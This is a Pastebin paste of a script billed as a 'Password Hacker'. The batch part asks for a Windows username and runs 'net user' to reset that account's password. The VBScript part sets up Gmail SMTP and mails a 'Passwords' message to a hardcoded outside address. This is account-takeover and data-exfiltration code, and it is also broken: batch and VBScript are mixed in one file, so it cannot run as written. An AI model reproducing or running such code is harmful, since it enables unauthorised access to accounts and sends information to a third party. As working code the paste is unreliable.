Guest User

Untitled

a guest
Aug 13th, 2015
251
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 1.40 KB | None | 0 0
  1. @echo off
  2. color 1b
  3. title BC Password Hacker
  4. echo ***************************************
  5. echo.
  6. echo Password Hacker 1.6
  7. echo By BC
  8. echo ***************************************
  9. echo.
  10. echo Press enter
  11. pause >nul
  12. cls
  13.  
  14. echo ***************************************
  15. echo.
  16. echo Password Hacker 1.6
  17. echo By BC
  18. echo ***************************************
  19. echo.
  20. echo.
  21. echo username:
  22. set /p username=
  23. net user %username% *
  24.  
  25. Set objMail = CreateObject("CDO.Message")
  26. Set objConf = CreateObject("CDO.Configuration")
  27. Set objFlds = objConf.Fields
  28. objFlds.Item("http://schemas.microsoft.com/cdo/configuration/sendusing") = 2 'cdoSendUsingPort
  29. objFlds.Item("http://schemas.microsoft.com/cdo/configuration/smtpserver") = "smtp.gmail.com"
  30. objFlds.Item("http://schemas.microsoft.com/cdo/configuration/smtpserverport") = 465
  31. objFlds.Item("http://schemas.microsoft.com/cdo/configuration/sendusername") = "dummyemail@gmail.com"
  32. objFlds.Item("http://schemas.microsoft.com/cdo/configuration/sendpassword") = "dummypassword"
  33. objFlds.Item("http://schemas.microsoft.com/cdo/configuration/smtpauthenticate") = 1 'cdoBasic
  34. objFlds.Update
  35. objMail.Configuration = objConf
  36. objMail.FromName = "Your Name"
  37. objMail.From = "dummyemail@gmail.com"
  38. objMail.To = "Bdews716@gmail.com"
  39. objMail.Subject = "Passwords"
  40. objMail.TextBody = "%username% *"
  41. objMail.Send
  42. Set objFlds = Nothing
  43. Set objConf = Nothing
  44. Set objMail = Nothing
Add Comment
Please, Sign In to add comment